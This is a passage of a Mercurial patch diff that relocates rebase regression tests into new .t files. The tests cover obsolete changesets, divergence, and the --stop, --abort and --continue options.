- $ hg log -G -T '{desc} {bookmarks}'
- @ B book
- |
- | x D1
- | |
- o | E
- | |
- | * C
- | |
- o | D2
- | |
- | x B
- |/
- o A
-
-Rebasing a merge with one of its parent having a hidden successor
-
- $ hg init $TESTTMP/merge-p1-hidden-successor
- $ cd $TESTTMP/merge-p1-hidden-successor
-
- $ hg debugdrawdag <<'EOS'
- > E
- > |
- > B3 B2 # amend: B1 -> B2 -> B3
- > |/ # B2 is hidden
- > | D
- > | |\
- > | B1 C
- > |/
- > A
- > EOS
- 1 new orphan changesets
-
- $ eval `hg tags -T '{tag}={node}\n'`
- $ rm .hg/localtags
-
- $ hg rebase -r $D -d $E
- rebasing 5:9e62094e4d94 "D"
-
- $ hg log -G
- o 7:a699d059adcf D
- |\
- | o 6:ecc93090a95c E
- | |
- | o 4:0dc878468a23 B3
- | |
- o | 1:96cc3511f894 C
- /
- o 0:426bada5c675 A
-
-For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.),
-rebasestate may contain hidden hashes. "rebase --abort" should work regardless.
-
- $ hg init $TESTTMP/hidden-state1
- $ cd $TESTTMP/hidden-state1
- $ cat >> .hg/hgrc <<EOF
- > [experimental]
- > rebaseskipobsolete=0
- > EOF
-
- $ hg debugdrawdag <<'EOS'
- > C
- > |
- > D B # prune: B, C
- > |/ # B/D=B
- > A
- > EOS
-
- $ eval `hg tags -T '{tag}={node}\n'`
- $ rm .hg/localtags
-
- $ hg update -q $C --hidden
- updated to hidden changeset 7829726be4dc
- (hidden revision '7829726be4dc' is pruned)
- $ hg rebase -s $B -d $D
- rebasing 1:2ec65233581b "B"
- merging D
- warning: conflicts while merging D! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
-
- $ cp -R . $TESTTMP/hidden-state2
-
- $ hg log -G
- @ 2:b18e25de2cf5 D
- |
- | % 1:2ec65233581b B (pruned using prune)
- |/
- o 0:426bada5c675 A
-
- $ hg summary
- parent: 2:b18e25de2cf5 tip
- D
- branch: default
- commit: 1 modified, 1 added, 1 unknown, 1 unresolved
- update: 1 new changesets, 2 branch heads (merge)
- phases: 3 draft
- rebase: 0 rebased, 2 remaining (rebase --continue)
-
- $ hg rebase --abort
- rebase aborted
-
-Also test --continue for the above case
-
- $ cd $TESTTMP/hidden-state2
- $ hg resolve -m
- (no more unresolved files)
- continue: hg rebase --continue
- $ hg rebase --continue
- rebasing 1:2ec65233581b "B"
- rebasing 3:7829726be4dc tip "C"
- $ hg log -G
- @ 5:1964d5d5b547 C
- |
- o 4:68deb90c12a2 B
- |
- o 2:b18e25de2cf5 D
- |
- o 0:426bada5c675 A
-
-====================
-Test --stop option |
-====================
- $ cd ..
- $ hg init rbstop
- $ cd rbstop
- $ echo a>a
- $ hg ci -Aqma
- $ echo b>b
- $ hg ci -Aqmb
- $ echo c>c
- $ hg ci -Aqmc
- $ echo d>d
- $ hg ci -Aqmd
- $ hg up 0 -q
- $ echo f>f
- $ hg ci -Aqmf
- $ echo D>d
- $ hg ci -Aqm "conflict with d"
- $ hg up 3 -q
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | o 2:177f92b77385 test
- | | c
- | |
- | o 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
- $ hg rebase -s 1 -d 5
- rebasing 1:d2ae7f538514 "b"
- rebasing 2:177f92b77385 "c"
- rebasing 3:055a42cdd887 "d"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop
- 1 new orphan changesets
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 7:7fffad344617 test
- | c
- |
- o 6:b15528633407 test
- | b
- |
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | x 2:177f92b77385 test
- | | c
- | |
- | x 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
-Test it aborts if unstable csets is not allowed:
-===============================================
- $ cat >> $HGRCPATH << EOF
- > [experimental]
- > evolution.allowunstable=False
- > EOF
-
- $ hg strip 6 --no-backup -q
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | o 2:177f92b77385 test
- | | c
- | |
- | o 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
- $ hg rebase -s 1 -d 5
- rebasing 1:d2ae7f538514 "b"
- rebasing 2:177f92b77385 "c"
- rebasing 3:055a42cdd887 "d"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop
- abort: cannot remove original changesets with unrebased descendants
- (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets)
- [255]
- $ hg rebase --abort
- saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg
- rebase aborted
-
-Test --stop when --keep is passed:
-==================================
- $ hg rebase -s 1 -d 5 --keep
- rebasing 1:d2ae7f538514 "b"
- rebasing 2:177f92b77385 "c"
- rebasing 3:055a42cdd887 "d"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 7:7fffad344617 test
- | c
- |
- o 6:b15528633407 test
- | b
- |
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | o 2:177f92b77385 test
- | | c
- | |
- | o 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
-Test --stop aborts when --collapse was passed:
-=============================================
- $ cat >> $HGRCPATH << EOF
- > [experimental]
- > evolution.allowunstable=True
- > EOF
-
- $ hg strip 6
- saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | o 2:177f92b77385 test
- | | c
- | |
- | o 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
- $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d"
- rebasing 1:d2ae7f538514 "b"
- rebasing 2:177f92b77385 "c"
- rebasing 3:055a42cdd887 "d"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop
- abort: cannot stop in --collapse session
- [255]
- $ hg rebase --abort
- rebase aborted
- $ hg diff
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | o 2:177f92b77385 test
- | | c
- | |
- | o 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
-Test --stop raise errors with conflicting options:
-=================================================
- $ hg rebase -s 3 -d 5
- rebasing 3:055a42cdd887 "d"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop --dry-run
- abort: cannot specify both --stop and --dry-run
- [10]
-
- $ hg rebase -s 3 -d 5
- abort: rebase in progress
- (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop')
- [20]
- $ hg rebase --stop --continue
- abort: cannot specify both --stop and --continue
- [10]
-
-Test --stop moves bookmarks of original revisions to new rebased nodes:
-======================================================================
- $ cd ..
- $ hg init repo
- $ cd repo
-
- $ echo a > a
- $ hg ci -Am A
- adding a
-
- $ echo b > b
- $ hg ci -Am B
- adding b
- $ hg book X
- $ hg book Y
-
- $ echo c > c
- $ hg ci -Am C
- adding c
- $ hg book Z
-
- $ echo d > d
- $ hg ci -Am D
- adding d
-
- $ hg up 0 -q
- $ echo e > e
- $ hg ci -Am E
- adding e
- created new head
-
- $ echo doubt > d
- $ hg ci -Am "conflict with d"
- adding d
-
- $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n"
- @ 5: 39adf30bc1be 'conflict with d' bookmarks:
- |
- o 4: 9c1e55f411b6 'E' bookmarks:
- |
- | o 3: 67a385d4e6f2 'D' bookmarks: Z
- | |
- | o 2: 49cb3485fa0c 'C' bookmarks: Y
- | |
- | o 1: 6c81ed0049f8 'B' bookmarks: X
- |/
- o 0: 1994f17a630e 'A' bookmarks:
-
- $ hg rebase -s 1 -d 5
- rebasing 1:6c81ed0049f8 X "B"
- rebasing 2:49cb3485fa0c Y "C"
- rebasing 3:67a385d4e6f2 Z "D"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop
- 1 new orphan changesets
- $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n"
- o 7: 9c86c650b686 'C' bookmarks: Y
- |
- o 6: 9b87b54e5fd8 'B' bookmarks: X
- |
- @ 5: 39adf30bc1be 'conflict with d' bookmarks:
- |
- o 4: 9c1e55f411b6 'E' bookmarks:
- |
- | * 3: 67a385d4e6f2 'D' bookmarks: Z
- | |
- | x 2: 49cb3485fa0c 'C' bookmarks:
- | |
- | x 1: 6c81ed0049f8 'B' bookmarks:
- |/
- o 0: 1994f17a630e 'A' bookmarks:
-
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-rebase-obsolete2.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,341 @@
+==========================
+Test rebase with obsolete
+==========================
+
+Enable obsolete
+
+ $ cat >> $HGRCPATH << EOF
+ > [command-templates]
+ > log= {rev}:{node|short} {desc|firstline}{if(obsolete,' ({obsfate})')}
+ > [experimental]
+ > evolution.createmarkers=True
+ > evolution.allowunstable=True
+ > [phases]
+ > publish=False
+ > [extensions]
+ > rebase=
+ > drawdag=$TESTDIR/drawdag.py
+ > strip=
+ > EOF
+
+Skip obsolete changeset even with multiple hops
+-----------------------------------------------
+
+setup
+
+ $ hg init obsskip
+ $ cd obsskip
+ $ cat << EOF >> .hg/hgrc
+ > [experimental]
+ > rebaseskipobsolete = True
+ > [extensions]
+ > strip =
+ > EOF
+ $ echo A > A
+ $ hg add A
+ $ hg commit -m A
+ $ echo B > B
+ $ hg add B
+ $ hg commit -m B0
+ $ hg commit --amend -m B1
+ $ hg commit --amend -m B2
+ $ hg up --hidden 'desc(B0)'
+ 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ updated to hidden changeset a8b11f55fb19
+ (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290)
+ $ echo C > C
+ $ hg add C
+ $ hg commit -m C
+ 1 new orphan changesets
+ $ hg log -G
+ @ 4:212cb178bcbb C
+ |
+ | o 3:261e70097290 B2
+ | |
+ x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290)
+ |/
+ o 0:4a2df7238c3b A
+
+
+Rebase finds its way in a chain of marker
+
+ $ hg rebase -d 'desc(B2)'
+ note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2"
+ rebasing 4:212cb178bcbb tip "C"
+
+Even when the chain include missing node
+
+ $ hg up --hidden 'desc(B0)'
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ updated to hidden changeset a8b11f55fb19
+ (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290)
+ $ echo D > D
+ $ hg add D
+ $ hg commit -m D
+ 1 new orphan changesets
+ $ hg --hidden strip -r 'desc(B1)'
+ saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg
+ 1 new orphan changesets
+ $ hg log -G
+ @ 5:1a79b7535141 D
+ |
+ | o 4:ff2c4d47b71d C
+ | |
+ | o 2:261e70097290 B2
+ | |
+ x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290)
+ |/
+ o 0:4a2df7238c3b A
+
+
+ $ hg rebase -d 'desc(B2)'
+ note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2"
+ rebasing 5:1a79b7535141 tip "D"
+ $ hg up 4
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo "O" > O
+ $ hg add O
+ $ hg commit -m O
+ $ echo "P" > P
+ $ hg add P
+ $ hg commit -m P
+ $ hg log -G
+ @ 8:8d47583e023f P
+ |
+ o 7:360bbaa7d3ce O
+ |
+ | o 6:9c48361117de D
+ | |
+ o | 4:ff2c4d47b71d C
+ |/
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+ $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ 1 new orphan changesets
+ $ hg rebase -d 6 -r "4::"
+ rebasing 4:ff2c4d47b71d "C"
+ note: not rebasing 7:360bbaa7d3ce "O", it has no successor
+ rebasing 8:8d47583e023f tip "P"
+
+If all the changeset to be rebased are obsolete and present in the destination, we
+should display a friendly error message
+
+ $ hg log -G
+ @ 10:121d9e3bc4c6 P
+ |
+ o 9:4be60e099a77 C
+ |
+ o 6:9c48361117de D
+ |
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+
+ $ hg up 9
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo "non-relevant change" > nonrelevant
+ $ hg add nonrelevant
+ $ hg commit -m nonrelevant
+ created new head
+ $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ $ hg log -G
+ @ 11:f44da1f4954c nonrelevant (pruned)
+ |
+ | o 10:121d9e3bc4c6 P
+ |/
+ o 9:4be60e099a77 C
+ |
+ o 6:9c48361117de D
+ |
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+ $ hg rebase -r . -d 10
+ note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor
+
+If a rebase is going to create divergence, it should abort
+
+ $ hg log -G
+ @ 10:121d9e3bc4c6 P
+ |
+ o 9:4be60e099a77 C
+ |
+ o 6:9c48361117de D
+ |
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+
+ $ hg up 9
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo "john" > doe
+ $ hg add doe
+ $ hg commit -m "john doe"
+ created new head
+ $ hg up 10
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo "foo" > bar
+ $ hg add bar
+ $ hg commit --amend -m "10'"
+ $ hg up 10 --hidden
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ updated to hidden changeset 121d9e3bc4c6
+ (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2)
+ $ echo "bar" > foo
+ $ hg add foo
+ $ hg commit -m "bar foo"
+ 1 new orphan changesets
+ $ hg log -G
+ @ 14:73568ab6879d bar foo
+ |
+ | o 13:77d874d096a2 10'
+ | |
+ | | o 12:3eb461388009 john doe
+ | |/
+ x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2)
+ |/
+ o 9:4be60e099a77 C
+ |
+ o 6:9c48361117de D
+ |
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+ $ hg summary
+ parent: 14:73568ab6879d tip (orphan)
+ bar foo
+ branch: default
+ commit: (clean)
+ update: 2 new changesets, 3 branch heads (merge)
+ phases: 8 draft
+ orphan: 1 changesets
+ $ hg rebase -s 10 -d 12
+ abort: this rebase will cause divergences from: 121d9e3bc4c6
+ (to force the rebase please set experimental.evolution.allowdivergence=True)
+ [20]
+ $ hg log -G
+ @ 14:73568ab6879d bar foo
+ |
+ | o 13:77d874d096a2 10'
+ | |
+ | | o 12:3eb461388009 john doe
+ | |/
+ x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2)
+ |/
+ o 9:4be60e099a77 C
+ |
+ o 6:9c48361117de D
+ |
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+With experimental.evolution.allowdivergence=True, rebase can create divergence
+
+ $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True
+ rebasing 10:121d9e3bc4c6 "P"
+ rebasing 14:73568ab6879d tip "bar foo"
+ 2 new content-divergent changesets
+ $ hg summary
+ parent: 16:61bd55f69bc4 tip
+ bar foo
+ branch: default
+ commit: (clean)
+ update: 1 new changesets, 2 branch heads (merge)
+ phases: 8 draft
+ content-divergent: 2 changesets
+
+rebase --continue + skipped rev because their successors are in destination
+we make a change in trunk and work on conflicting changes to make rebase abort.
+
+ $ hg log -G -r 16::
+ @ 16:61bd55f69bc4 bar foo
+ |
+ ~
+
+Create the two changes in trunk
+ $ printf "a" > willconflict
+ $ hg add willconflict
+ $ hg commit -m "willconflict first version"
+
+ $ printf "dummy" > C
+ $ hg commit -m "dummy change successor"
+
+Create the changes that we will rebase
+ $ hg update -C 16 -q
+ $ printf "b" > willconflict
+ $ hg add willconflict
+ $ hg commit -m "willconflict second version"
+ created new head
+ $ printf "dummy" > K
+ $ hg add K
+ $ hg commit -m "dummy change"
+ $ printf "dummy" > L
+ $ hg add L
+ $ hg commit -m "dummy change"
+ $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ 1 new orphan changesets
+
+ $ hg log -G -r 16::
+ @ 21:7bdc8a87673d dummy change
+ |
+ x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51)
+ |
+ o 19:b82fb57ea638 willconflict second version
+ |
+ | o 18:601db7a18f51 dummy change successor
+ | |
+ | o 17:357ddf1602d5 willconflict first version
+ |/
+ o 16:61bd55f69bc4 bar foo
+ |
+ ~
+ $ hg rebase -r ".^^ + .^ + ." -d 18
+ rebasing 19:b82fb57ea638 "willconflict second version"
+ merging willconflict
+ warning: conflicts while merging willconflict! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+
+ $ hg resolve --mark willconflict
+ (no more unresolved files)
+ continue: hg rebase --continue
+ $ hg rebase --continue
+ rebasing 19:b82fb57ea638 "willconflict second version"
+ note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor"
+ rebasing 21:7bdc8a87673d tip "dummy change"
+ $ cd ..
+
+Can rebase pruned and rewritten commits with --keep
+
+ $ hg init keep
+ $ cd keep
+ $ hg debugdrawdag <<'EOS'
+ > D
+ > |
+ > C
+ > |
+ > F B E # prune: B
+ > \|/ # rebase: C -> E
+ > A
+ > EOS
+ 1 new orphan changesets
+
+ $ hg rebase -b D -d F --keep
+ rebasing 1:112478962961 B "B"
+ rebasing 4:26805aba1e60 C "C"
+ rebasing 5:f585351a92f8 D tip "D"
+
+ $ cd ..
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-rebase-obsolete3.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,669 @@
+==========================
+Test rebase with obsolete
+==========================
+
+Enable obsolete
+
+ $ cat >> $HGRCPATH << EOF
+ > [command-templates]
+ > log= {rev}:{node|short} {desc|firstline}{if(obsolete,' ({obsfate})')}
+ > [experimental]
+ > evolution.createmarkers=True
+ > evolution.allowunstable=True
+ > [phases]
+ > publish=False
+ > [extensions]
+ > rebase=
+ > drawdag=$TESTDIR/drawdag.py
+ > strip=
+ > EOF
+
+Divergence cases due to obsolete changesets
+-------------------------------------------
+
+We should ignore branches with unstable changesets when they are based on an
+obsolete changeset which successor is in rebase set.
+
+ $ hg init divergence
+ $ cd divergence
+ $ cat >> .hg/hgrc << EOF
+ > [extensions]
+ > strip =
+ > [alias]
+ > strip = strip --no-backup --quiet
+ > [templates]
+ > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n'
+ > EOF
+
+ $ hg debugdrawdag <<EOF
+ > e f
+ > | |
+ > d' d # replace: d -> d'
+ > \ /
+ > c
+ > |
+ > x b
+ > \|
+ > a
+ > EOF
+ 1 new orphan changesets
+ $ hg log -G -r 'a'::
+ * 7:1143e9adc121 f
+ |
+ | o 6:d60ebfa0f1cb e
+ | |
+ | o 5:027ad6c5830d d'
+ | |
+ x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
+ |/
+ o 3:a82ac2b38757 c
+ |
+ | o 2:630d7c95eff7 x
+ | |
+ o | 1:488e1b7e7341 b
+ |/
+ o 0:b173517d0057 a
+
+
+Changeset d and its descendants are excluded to avoid divergence of d, which
+would occur because the successor of d (d') is also in rebaseset. As a
+consequence f (descendant of d) is left behind.
+
+ $ hg rebase -b 'e' -d 'x'
+ rebasing 1:488e1b7e7341 b "b"
+ rebasing 3:a82ac2b38757 c "c"
+ note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence
+ rebasing 5:027ad6c5830d d' "d'"
+ rebasing 6:d60ebfa0f1cb e "e"
+ $ hg log -G -r 'a'::
+ o 11:eb6d63fc4ed5 e
+ |
+ o 10:44d8c724a70c d'
+ |
+ o 9:d008e6b4d3fd c
+ |
+ o 8:67e8f4a16c49 b
+ |
+ | * 7:1143e9adc121 f
+ | |
+ | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5)
+ | | |
+ | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c)
+ | | |
+ | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
+ | |/
+ | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd)
+ | |
+ o | 2:630d7c95eff7 x
+ | |
+ | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49)
+ |/
+ o 0:b173517d0057 a
+
+ $ hg strip -r 8:
+ $ hg log -G -r 'a'::
+ * 7:1143e9adc121 f
+ |
+ | o 6:d60ebfa0f1cb e
+ | |
+ | o 5:027ad6c5830d d'
+ | |
+ x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
+ |/
+ o 3:a82ac2b38757 c
+ |
+ | o 2:630d7c95eff7 x
+ | |
+ o | 1:488e1b7e7341 b
+ |/
+ o 0:b173517d0057 a
+
+
+If the rebase set has an obsolete (d) with a successor (d') outside the rebase
+set and none in destination, we still get the divergence warning.
+By allowing divergence, we can perform the rebase.
+
+ $ hg rebase -r 'c'::'f' -d 'x'
+ abort: this rebase will cause divergences from: 76be324c128b
+ (to force the rebase please set experimental.evolution.allowdivergence=True)
+ [20]
+ $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x'
+ rebasing 3:a82ac2b38757 c "c"
+ rebasing 4:76be324c128b d "d"
+ rebasing 7:1143e9adc121 f tip "f"
+ 1 new orphan changesets
+ 2 new content-divergent changesets
+ $ hg log -G -r 'a':: -T instabilities
+ o 10:e1744ea07510 f
+ |
+ * 9:e2b36ea9a0a0 d (content-divergent)
+ |
+ o 8:6a0376de376e c
+ |
+ | x 7:1143e9adc121 f
+ | |
+ | | * 6:d60ebfa0f1cb e (orphan)
+ | | |
+ | | * 5:027ad6c5830d d' (orphan content-divergent)
+ | | |
+ | x | 4:76be324c128b d
+ | |/
+ | x 3:a82ac2b38757 c
+ | |
+ o | 2:630d7c95eff7 x
+ | |
+ | o 1:488e1b7e7341 b
+ |/
+ o 0:b173517d0057 a
+
+ $ hg strip -r 8:
+
+(Not skipping obsoletes means that divergence is allowed.)
+
+ $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x'
+ rebasing 3:a82ac2b38757 c "c"
+ rebasing 4:76be324c128b d "d"
+ rebasing 7:1143e9adc121 f tip "f"
+ 1 new orphan changesets
+ 2 new content-divergent changesets
+
+ $ hg strip -r 0:
+
+Similar test on a more complex graph
+
+ $ hg debugdrawdag <<EOF
+ > g
+ > |
+ > f e
+ > | |
+ > e' d # replace: e -> e'
+ > \ /
+ > c
+ > |
+ > x b
+ > \|
+ > a
+ > EOF
+ 1 new orphan changesets
+ $ hg log -G -r 'a':
+ * 8:2876ce66c6eb g
+ |
+ | o 7:3ffec603ab53 f
+ | |
+ x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea)
+ | |
+ | o 5:63324dc512ea e'
+ | |
+ o | 4:76be324c128b d
+ |/
+ o 3:a82ac2b38757 c
+ |
+ | o 2:630d7c95eff7 x
+ | |
+ o | 1:488e1b7e7341 b
+ |/
+ o 0:b173517d0057 a
+
+ $ hg rebase -b 'f' -d 'x'
+ rebasing 1:488e1b7e7341 b "b"
+ rebasing 3:a82ac2b38757 c "c"
+ rebasing 4:76be324c128b d "d"
+ note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence
+ rebasing 5:63324dc512ea e' "e'"
+ rebasing 7:3ffec603ab53 f "f"
+ $ hg log -G -r 'a':
+ o 13:ef6251596616 f
+ |
+ o 12:b6f172e64af9 e'
+ |
+ | o 11:a1707a5b7c2c d
+ |/
+ o 10:d008e6b4d3fd c
+ |
+ o 9:67e8f4a16c49 b
+ |
+ | * 8:2876ce66c6eb g
+ | |
+ | | x 7:3ffec603ab53 f (rewritten using rebase as 13:ef6251596616)
+ | | |
+ | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea)
+ | | |
+ | | x 5:63324dc512ea e' (rewritten using rebase as 12:b6f172e64af9)
+ | | |
+ | x | 4:76be324c128b d (rewritten using rebase as 11:a1707a5b7c2c)
+ | |/
+ | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd)
+ | |
+ o | 2:630d7c95eff7 x
+ | |
+ | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49)
+ |/
+ o 0:b173517d0057 a
+
+
+issue5782
+ $ hg strip -r 0:
+ $ hg debugdrawdag <<EOF
+ > d
+ > |
+ > c1 c # replace: c -> c1
+ > \ /
+ > b
+ > |
+ > a
+ > EOF
+ 1 new orphan changesets
+ $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'`
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ $ hg log -G -r 'a': --hidden
+ * 4:76be324c128b d
+ |
+ | x 3:ef8a456de8fa c1 (pruned)
+ | |
+ x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa)
+ |/
+ o 1:488e1b7e7341 b
+ |
+ o 0:b173517d0057 a
+
+ $ hg rebase -d 0 -r 2
+ note: not rebasing 2:a82ac2b38757 c "c", it has no successor
+ $ hg log -G -r 'a': --hidden
+ * 4:76be324c128b d
+ |
+ | x 3:ef8a456de8fa c1 (pruned)
+ | |
+ x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa)
+ |/
+ o 1:488e1b7e7341 b
+ |
+ o 0:b173517d0057 a
+
+ $ cd ..
+
+Start a normal rebase. When it runs into conflicts, rewrite one of the
+commits in the rebase set, causing divergence when the rebase continues.
+
+ $ hg init $TESTTMP/new-divergence-after-conflict
+ $ cd $TESTTMP/new-divergence-after-conflict
+ $ hg debugdrawdag <<'EOS'
+ > C2
+ > | C1
+ > |/
+ > B # B/D=B
+ > | D
+ > |/
+ > A
+ > EOS
+ $ hg rebase -r B::C1 -d D
+ rebasing 1:2ec65233581b B "B"
+ merging D
+ warning: conflicts while merging D! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg debugobsolete $(hg log -r C1 -T '{node}') $(hg log -r C2 -T '{node}')
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ $ hg log -G
+ o 4:fdb9df6b130c C2
+ |
+ | x 3:7e5bfd3c08f0 C1 (rewritten as 4:fdb9df6b130c)
+ |/
+ | @ 2:b18e25de2cf5 D
+ | |
+ % | 1:2ec65233581b B
+ |/
+ o 0:426bada5c675 A
+
+ $ echo resolved > D
+ $ hg resolve -m D
+ (no more unresolved files)
+ continue: hg rebase --continue
+ $ hg rebase -c
+ rebasing 1:2ec65233581b B "B"
+ note: not rebasing 3:7e5bfd3c08f0 C1 "C1" and its descendants as this would cause divergence
+ 1 new orphan changesets
+
+Rebase merge where successor of one parent is equal to destination (issue5198)
+
+ $ hg init p1-succ-is-dest
+ $ cd p1-succ-is-dest
+
+ $ hg debugdrawdag <<EOF
+ > F
+ > /|
+ > E D B # replace: D -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d B -s D
+ note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
+ rebasing 4:66f1a38021c9 F tip "F"
+ $ hg log -G
+ o 5:50e9d60b99c6 F
+ |\
